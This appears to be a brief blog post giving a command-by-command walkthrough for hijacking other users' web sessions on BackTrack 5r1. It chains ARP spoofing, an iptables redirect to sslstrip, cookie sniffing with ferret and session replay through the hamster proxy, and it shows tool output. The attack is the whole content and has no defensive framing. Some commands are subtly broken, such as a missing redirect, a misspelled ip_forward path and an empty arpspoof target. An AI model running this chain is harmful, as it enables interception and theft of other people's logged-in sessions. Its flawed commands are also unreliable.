control – ferret and hamster

client web session viewing with ferret and hamster

backtrack 5r1

1.
root@bt:~# echo 1 /proc/sys/net/ipv4/ip_foward
1 /proc/sys/net/ipv4/ip_foward

2.
root@bt:~# arpspoof -i eth0 -t

3.
root@bt:~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-ports 10000

4.
root@bt:~#cd /pentest/web/sslstrip
root@bt:/pentest/web/sslstrip# python sslstrip.py -p -k -f

sslstrip 0.9 by Moxie Marlinspike running…

5.
root@bt:~# /pentest/sniffers/hamster/ferret -i eth0
[0] /pentest/sniffers/hamster/ferret
[1] -i
[2] wlan0
— FERRET 1.2.0 – 2008 (c) Errata Security
— build = Jun 26 2011 00:50:06 (32-bits)
— libpcap version 1.0.0
1 eth0 (No description available)
2 wlan0 (No description available)
3 usbmon1 (USB bus number 1)
4 usbmon2 (USB bus number 2)
5 usbmon3 (USB bus number 3)
6 usbmon4 (USB bus number 4)
7 usbmon5 (USB bus number 5)
8 any (Pseudo-device that captures on all interfaces)
9 lo (No description available)

— Sniffing on interface “eth0”
SNIFFING: eth0
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.254], macaddr=[00:01:02:03:99:ab]
ID-MAC=[00:01:02:03:99:ab], ip=[192.168.1.254]
Traffic seen

6.
root@bt:~#cd /pentest/sniffers/hamster

root@bt:/pentest/sniffers/hamster# ./hamster

— HAMPSTER 2.0 side-jacking tool —
begining thread
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234

7.
Firefox set proxy to 127.0.0.1 port 1234

8.
Clear all cache (cookies)

8.
http://hamster/

Advertisements

2 thoughts on “control – ferret and hamster

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s